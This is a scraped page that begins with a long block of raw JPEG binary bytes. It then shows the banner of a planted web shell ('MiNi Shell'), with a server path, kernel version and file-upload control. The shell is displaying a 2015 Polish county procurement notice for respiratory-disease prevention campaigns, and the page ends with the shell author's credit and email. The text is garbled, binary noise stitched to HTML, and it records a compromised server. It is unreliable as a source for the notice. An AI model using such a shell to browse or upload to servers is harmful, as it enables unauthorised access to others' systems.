JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150212/31558-N-2015.html

<p class="kh_header"><b>Ostrołęka: PRZEPROWADZENIE AKCJI PROFILAKTYCZNYCH W ZAKRESIE CHORÓB UKŁADU ODDECHOWEGO NA TERENIE POWIATU OSTROŁĘCKIEGO</b><br>
<b>Numer ogłoszenia: 31558 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ostrołęcki , pl. gen. J. Bema 5, 07-410 Ostrołęka, woj. mazowieckie, tel. 29 764 28 15, faks 29 764 32 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatostrolecki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE AKCJI PROFILAKTYCZNYCH W ZAKRESIE CHORÓB UKŁADU ODDECHOWEGO NA TERENIE POWIATU OSTROŁĘCKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia 22 akcji profilaktycznych (badania profilaktyczne, konsultacje medyczne, spotkania edukacyjne) na terenie 11 gmin powiatu ostrołęckiego i 8 zajęć edukacyjnych w szkołach powiatowych w zakresie chorób układu oddechowego zgodnie 
z następującym zakresem rzeczowym:
1.Badania profilaktyczne dla 4400 osób w zakresie: 
a.spirometrii
b.stężenia tlenku węgla w wydychanym powietrzu
c.pomiaru poziomu cholesterolu we krwi 
d.pomiaru poziomu cukru we krwi 
e.pomiaru poziomu trójglicerydów 
f.pomiaru ciśnienia
2.Konsultacje medyczne dla uczestników badań profilaktycznych, w tym:
-przeprowadzenie wywiadu medycznego,-
-ocena stanu zdrowia w zakresie chorób układu oddechowego, w tym analiza wyników badań profilaktycznych, o których mowa w pkt.1,
-kierowanie do poradni pulmonologicznej i na badania pogłębione (RTG klatki piersiowej, TK klatki piersiowej z kontrastem i bez) do placówki medycznej wskazanej przez Zamawiającego. 
3.Spotkania edukacyjne w zakresie ciężkich przewlekłych schorzeń dolnych dróg oddechowych tj. zapalenia płuc i chorób przewlekłych płuc; szkodliwości palenia tytoniu, uzależnienia od alkoholu i od narkotyków dla uczestników badań profilaktycznych (4400 os.).
4.Zajęcia edukacyjne w zakresie ciężkich przewlekłych schorzeń dolnych dróg oddechowych tj. zapalenia płuc i chorób przewlekłych płuc a także palenia tytoniu, uzależnienia od narkotyków i alkoholu dla 400 osób (młodzież z 8 zespołów szkół powiatowych). 
5.Docelowa grupa akcji profilaktycznych i zajęć edukacyjnych: (mieszkańcy powiatu ostrołęckiego) - łącznie 4800 osób, w tym:
a.mężczyźni w wieku 35-59 lat, - bezrobotni bądź zatrudnieni w rolnictwie,
b.osoby po 65 roku życia,
c.regularni palacze,
d.bierni palacze - rodziny regularnych palaczy,
e.młodzież szkolna.
6.Ramowy okres realizacji przedmiotu zamówienia: 
15 marzec 2015 - 31 marzec 2016r., szczegółowy harmonogram 22 akcji profilaktycznych i 8 zajęć edukacyjnych ustalony zostanie z wybranym Wykonawcą po podpisaniu umowy.
7.Miejsce realizacji:
a.akcji profilaktycznych (zabezpiecza Zamawiający):
-11 gmin powiatu ostrołęckiego,
-dwa spotkania w każdej gminie,
-dzień tygodnia przewidziany na spotkania - niedziela, 
-czas trwania - min. 8 godzin
b.zajęć edukacyjnych (zabezpiecza Zamawiający):
-8 zespołów szkół powiatowych (Baranowo, Czerwin, Goworowo, Lelis, Łyse, Kadzidło, Myszyniec, Troszyn),
-czas trwania - max. 2 godziny lekcyjne, w trakcie roku szkolnego.
8.W ramach każdej akcji (badania profilaktyczne i spotkania edukacyjne) Wykonawca zapewnia:
a.Personel medyczny i nie medyczny - łącznie 17 osób, w tym:
-lekarz (pulmonolog, internista ze specjalizacją bądź w trakcie) - 3  osoby, 
-pielęgniarka z wyższym wykształceniem z kursem specjalistycznym w zakresie wykonywania badań spirometrycznych  - 1 osoba,
-pielęgniarka z wyższym wykształceniem - 7 osób,
-pielęgniarka z wyższym wykształceniem z przygotowaniem pedagogicznym - 3 osoby,
-dietetyk-1 osoba,
-specjalista w zakresie żywienia w chorobach wewnętrznych i metabolicznych - 1 osoba,
-osoba do obsługi techniczno - administracyjnej - 1 osoba
b.sprzęt:
-spirometry - min. 3 szt. wraz z niezbędnym sprzętem w tym zabezpieczenie ustników minimum 4400 sztuk
-urządzenie do pomiaru tlenku węgla w wydychanym powietrzu - min. 2 szt.,
-paski do pomiaru poziomu cholesterolu - min 4400 szt. (urządzenie marki Accutrend Plus zapewnia Zamawiający),
-paski do pomiaru poziomu cukru - min 4400 szt. (urządzenie marki
Accutrend Plus zapewnia Zamawiający),
-paski do pomiaru trójglicerydów - min. 4400 szt. (urządzenie marki
Accutrend Plus zapewnia Zamawiający),
-urządzenie do pomiaru ciśnienia marki Omron II zapewnia Zamawiający.
c.prezentacje multimedialne dotyczące:
-wpływu alkoholu na rozwój człowieka,
-uzależnień od narkotyków,
-skutków zdrowotnych dot. palenia tytoniu.
Pomoce dydaktyczne (zestawy modeli lalek, walizki 3D prezentujące narządy człowieka, plansze edukacyjne itp.) oraz sprzęt komputerowy 
i multimedialny (laptopy, rzutnik i ekran projekcyjny) zapewnia Zamawiający,
d. prezentacje piramidy zdrowia połączoną z degustacją potraw. 
9.W ramach, każdych zajęć edukacyjnych Wykonawca zapewnia:
a.personel medyczny - pielęgniarka z wyższym wykształceniem z przygotowaniem pedagogicznym - 3 osoby,
b.prezentacje multimedialne dotyczące:
-wpływu alkoholu na rozwój człowieka,
-uzależnień od narkotyków,
-skutków zdrowotnych dot. palenia tytoniu.
Pomoce dydaktyczne (zestawy modeli lalek, walizki 3D prezentujące narządy człowieka, plansze edukacyjne itp.) sprzęt komputerowy i multimedialny (laptopy, rzutnik i ekran projekcyjny) zapewnia Zamawiający.
10.Wykonawca zobowiązany jest do udokumentowania: 
a.każdej akcji profilaktycznej, następującymi dokumentami:
-dokument deklaracji udziału uczestnika w projekcie zawierający m.in. kwestionariusz osobowy, deklaracje udziału i zgody na przetwarzanie danych osobowych i wykorzystania wizerunku, wywiad społeczno-zdrowotny, wykaz wykonanych badań - zgodnie z klasyfikacją ICD 9, terminy ich wykonania, wyniki, kwalifikacje i zalecenia lekarskie, inne niezbędne (opracowanie i druk należy do Wykonawcy, po uzgodnieniu treści z Zamawiającym)
-lista uczestników badań,
-lista odbioru drobnego sprzętu medycznego, który w trakcie akcji przekazany zostanie uczestnikom (Zamawiający na własny koszt zabezpiecza inhalatory i aparaty do gimnastyki oddechowej),
-lista odbioru materiałów informacyjno-promocyjnych i gadżetów, które 
w trakcie akcji przekazane zostaną uczestnikom (Zamawiający zabezpiecza na własny koszt materiały i gadżety),
b.każdych zajęć edukacyjnych
-dziennik zajęć z listą obecności młodzieży na zajęciach, poświadczoną przez nauczyciela,
-lista odbioru materiałów informacyjno-promocyjnych i gadżetów, które 
w trakcie zajęć przekazane zostaną uczestnikom (Zamawiający zabezpiecza na własny koszt materiały i gadżety),
11.Pozostałe warunki realizacji zamówienia: 
Wykonawca zobowiązany jest do:
a. sporządzania miesięcznego sprawozdania z realizacji umowy,
b. przetwarzania danych osobowych uczestników Projektu zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2014 r. poz. 1182, z późn. zm.) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024).
c. archiwizowania w okresie trwania umowy dokumentów związanych z realizacją przedmiotu umowy i przechowywania w formie papierowej i na elektronicznych nośnikach danych w sposób gwarantujący należyte bezpieczeństwo informacji wszelkich danych z nim związanych,
d. oznaczenia wszelkich dokumentów wytworzonych w ramach realizacji zamówienia zgodnie Podręcznikiem komunikacji i identyfikacji wizualnej oraz wymogami dotyczącymi informacji i promocji, dostępnymi na stronie www.eog.gov.pl. 
e. zapewnienia utylizacji odpadów medycznych zgodnie z obowiązującymi przepisami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu w oparciu o formułę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania wiedzy i doświadczenia zamawiający uzna przeprowadzenie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie - co najmniej  1 akcji profilaktycznej 
Zamawiający dokona oceny spełnienia tego warunku w oparciu o formułę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu w oparciu o formułę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-lekarz (pulmonolog, internista ze specjalizacją bądź w trakcie) - 3  osoby, 
-pielęgniarka z wyższym wykształceniem z kursem specjalistycznym w zakresie wykonywania badań spirometrycznych  - 1 osoba,
-pielęgniarka z wyższym wykształceniem - 7 osób,
-pielęgniarka z wyższym wykształceniem z przygotowaniem pedagogicznym - 3 osoby,
-dietetyk-1 osoba,
-specjalista w zakresie żywienia w chorobach wewnętrznych i metabolicznych - 1 osoba,
-osoba do obsługi techniczno - administracyjnej - 1 osoba
Zamawiający dokona oceny spełnienia tego warunku w oparciu o formułę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od uszczegółowienia wymagań w zakresie tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu w oparciu o formułę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty sporządzony na podstawie wzoru stanowiącego załącznik
 nr 1 do SIWZ,
2) Zaakceptowaną umowę (załącznik nr 10 do siwz).
3) Oświadczenie, że wykonawca nie zalega w Urzędzie Skarbowym z opłacaniem podatków lub oświadczenie, że uzyskał zgodę na zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - zał. Nr 8.
4)Oświadczenie, że wykonawca nie zalega w Zakładzie Ubezpieczeń Społecznych z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne.- zał. Nr 9</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Ilość przeprowadzonych akcji profilaktycznych - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy i określa następujące warunki takich zmian : 
- zmiana wartości umowy w przypadku: 
a)  jeśli liczba uczestników akcji profilaktycznych  będzie większa niż 4400 osób - wartość umowy zostanie zwiększona proporcjonalnie do zwiększonej liczby przebadanych uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatostrolecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ostrołęce Plac gen. J. Bema 5 pokój nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2015 godzina 11:00, miejsce: Starostwo Powiatowe w Ostrołęce Plac gen. J. Bema 5 pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  DBAM O ODDECH - Profilaktyka chorób układu oddechowego w powiecie ostrołęckim  Nr 030-13-14
dofinansowany przez Norweski Mechanizm Finansowy 2009-2014 oraz budżet państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com